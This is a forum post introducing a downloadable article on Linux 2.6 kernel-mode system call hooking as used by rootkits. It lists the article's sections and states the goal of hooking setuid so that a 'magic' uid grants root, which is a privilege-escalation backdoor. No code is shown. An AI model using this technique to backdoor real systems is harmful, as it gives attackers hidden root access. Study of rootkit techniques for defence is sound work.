Kernel Mode Hooking

Real implementations of various techniques. Source included.
Post Reply
oblique
Posts: 1
Joined: Wed May 05, 2010 1:17 am

Kernel Mode Hooking

Post by oblique »

In this article I will show you the basic technique that rootkits use, which we can use to hook system calls in kernel mode. I will deal only with Linux 2.6 x86-32 and Linux 2.6 x86-64. In the end we are going to hook the setuid system call which when takes a "magic" uid as an argument it will give root to the process.
The article is available in Greek and English and the sections are listed below:

Code: Select all

    0x01] Introduction
    0x02] Kernel mode hooking basic theory
    0x03] LKM - hello kernel
    0x04] Interrupt Descriptor Table (IDT)
    0x05] Get sys_call_table - Linux x86-32
    0x06] Model-Specific Registers (MSRs)
    0x07] Get sys_call_table - Linux x86-64
    0x08] Get ia32_sys_call_table - Linux x86-64
    0x09] Map to a writable memory
    0x0A] Hook a system call
    0x0B] Other ideas/methods
    0x0C] Greets
    0x0D] References
You can download the article with the source codes from here.

Enjoy ;)
Post Reply